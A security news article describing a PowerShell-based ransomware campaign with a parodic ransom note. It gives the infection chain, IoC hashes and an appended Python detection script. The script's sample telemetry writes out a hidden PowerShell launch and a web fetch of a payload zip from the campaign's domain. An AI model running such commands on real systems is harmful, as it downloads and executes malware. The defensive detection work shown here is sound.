
New Ransomware Campaign Mocks Elon Musk Supporters, Deploys Payloads via PowerShell

A new ransomware campaign has emerged, targeting users through a sophisticated multi-stage infection chain while delivering satirical commentary aimed at Elon Musk supporters.

Security researchers have identified this wave of attacks as relying on social engineering and PowerShell-based payloads, combining technical skill, social parody and financial motivation in an unusual mix.

Parody and Political Satire Blend

The initial infection vector begins with a phishing PDF titled “Pay Adjustment,” designed to ensnare victims through a supposed compensation update.

When opened, the document links to a Zip file hosted on Netlify, a legitimate cloud platform often abused by threat actors for payload delivery.

This archive contains a shortcut (LNK) file, which, upon execution, triggers a PowerShell script (Pay.ps1) that acts as the first-stage dropper.

The chain continues with execution of stage1.ps1, a script responsible for orchestrating subsequent payloads and escalating the attack.

An in-depth technical analysis reveals the campaign’s modular architecture. The first-stage PowerShell script, stage1.ps1, operates as a loader and orchestrator, deploying a range of components.

Among these, “cwiper.exe” stands out as a ransomware binary exhibiting characteristics similar to the “Fog” ransomware family.

Its ransom note, named RANSOMNOTE.txt, not only demands payment in Monero but also parodies the cryptocurrency community.

The note impersonates “Edward Coristine” of DOGE and bizarrely lists U.S. government email addresses as support contacts, underlining the campaign’s satirical underpinnings.

Technical Sophistication in New Attack

Further enhancing the attack’s sophistication, the campaign includes “ktool.exe,” which leverages the Bring Your Own Vulnerable Driver (BYOVD) technique, granting the adversaries kernel-level access to the target system.

The attackers utilize “trackerjacker.ps1,” an XOR-obfuscated script, to maintain stealth and avoid detection.

Meanwhile, “lootsubmit.ps1” performs reconnaissance and geolocation using the Wigle Wi-Fi geolocation API, helping the operators profile infected systems more effectively.

Interestingly, as the ransomware executes, it launches a YouTube video mocking Elon Musk, likely serving as both a distraction and a reinforcement of the campaign’s parodic messaging.

This combination of technical execution and deliberate mockery points to a hybrid motivation: blending cybercriminal financial incentive with trolling and political commentary.

Despite the apparent satire, the presence of a Monero wallet in the ransom note confirms that profit remains a primary motive.


The campaign’s use of cloud-hosted infrastructure, multi-stage PowerShell attack chains, and BYOVD techniques highlights both a high level of technical proficiency and an evolving threat landscape where social and political narratives are weaponized alongside malware.

Researchers urge organizations to be wary of unsolicited emails containing PDF attachments and to monitor for suspicious PowerShell activity, especially when linked to cloud-hosted payloads.

Indicators of Compromise (IOCs)

Type                 Value (SHA256 hash for the file rows)
Domain               hilarious-trifle-d9182e[.]netlify[.]app
PDF                  6eb8b5986ea95877146adc1c6ed48ca2c304d23bc8a4a904b6e6d22d55bceec3
cwiper.exe           ecfed78315f942fe0e6762acd73ef7f30c34620615ef5e71f899e1d069dabd9e
ktool.exe            335411c83e1419c7a9074c1fe0775244e020ccebad76582d12898a3f8c2778a0
trackerjacker.ps1    82137b80c2d59095e18330b1793c38b4358ae3b9f8ef2ff96656637cd2d0c891
lootsubmit.ps1       0100a169f6b2008f7884b7685f9b71e68fe62de13be045dfabe6dc699a7f1f4d
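One way to act on the researchers' advice to monitor PowerShell activity tied to cloud-hosted payloads, and on the IoC table above, as an added example that is not from the article or the researchers it cites: a Python triage routine that checks constructed process-creation events for the campaign's hashes, component file names, Netlify-hosted URLs and Explorer-launched PowerShell scripts. The event record shape, the sample telemetry, and the assumption that double-clicking the LNK produces an explorer.exe parent for powershell.exe are mine, not the article's.

```python
import re
from dataclasses import dataclass
# Indicators copied from the article's IoC table (SHA256 -> component).
IOC_HASHES = {
    "6eb8b5986ea95877146adc1c6ed48ca2c304d23bc8a4a904b6e6d22d55bceec3": "Pay Adjustment PDF",
    "ecfed78315f942fe0e6762acd73ef7f30c34620615ef5e71f899e1d069dabd9e": "cwiper.exe",
    "335411c83e1419c7a9074c1fe0775244e020ccebad76582d12898a3f8c2778a0": "ktool.exe",
    "82137b80c2d59095e18330b1793c38b4358ae3b9f8ef2ff96656637cd2d0c891": "trackerjacker.ps1",
    "0100a169f6b2008f7884b7685f9b71e68fe62de13be045dfabe6dc699a7f1f4d": "lootsubmit.ps1",
}
# Component file names the article attributes to the infection chain.
STAGE_NAMES = ("pay.ps1", "stage1.ps1", "trackerjacker.ps1",
               "lootsubmit.ps1", "cwiper.exe", "ktool.exe")
# Any netlify.app URL in a command line: the platform is legitimate, so this is a triage signal, not a block rule.
NETLIFY_URL = re.compile(r"https?://[\w.-]+\.netlify\.app/", re.I)

@dataclass
class ProcEvent:  # minimal process-creation record; a constructed shape, not a real EDR schema
    image: str        # executable name of the new process
    parent: str       # executable name of its parent
    cmdline: str      # full command line
    sha256: str = ""  # hash of the image file, lowercase hex

def triage(ev: ProcEvent) -> list[str]:
    """Return every reason the event matches the campaign; an empty list means no match."""
    reasons = []
    img, parent, cmd = ev.image.lower(), ev.parent.lower(), ev.cmdline.lower()
    if ev.sha256.lower() in IOC_HASHES:
        reasons.append(f"known hash: {IOC_HASHES[ev.sha256.lower()]}")
    for name in STAGE_NAMES:
        if img == name or name in cmd:
            reasons.append(f"campaign component name: {name}")
    if NETLIFY_URL.search(ev.cmdline):
        reasons.append("payload fetched from a netlify.app host")
    # Assumption: double-clicking the LNK yields explorer.exe -> powershell.exe <script>.ps1.
    if img == "powershell.exe" and parent == "explorer.exe" and ".ps1" in cmd:
        reasons.append("PowerShell script launched from Explorer (LNK pattern)")
    return reasons

def scan(events: list[ProcEvent]) -> dict[str, list[str]]:  # matching events only, keyed by command line
    return {ev.cmdline: r for ev in events if (r := triage(ev))}

SAMPLE_EVENTS = [  # constructed sample telemetry, not captured data
    ProcEvent("powershell.exe", "svchost.exe", "powershell.exe -File C:\\Scripts\\inventory.ps1"),
    ProcEvent("powershell.exe", "explorer.exe", "powershell.exe -w hidden -File Pay.ps1"),
    ProcEvent("powershell.exe", "powershell.exe",
              "powershell.exe -c iwr https://hilarious-trifle-d9182e.netlify.app/payload.zip"),
    ProcEvent("cwiper.exe", "powershell.exe", "cwiper.exe",
              "ecfed78315f942fe0e6762acd73ef7f30c34620615ef5e71f899e1d069dabd9e"),
]
```

Running `scan(SAMPLE_EVENTS)` flags the last three events and drops the scheduled inventory script, which shares the `-File` pattern but none of the campaign's indicators.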


The post New Ransomware Campaign Mocks Elon Musk Supporters, Deploys Payloads via PowerShell appeared first on Cyber Security News.
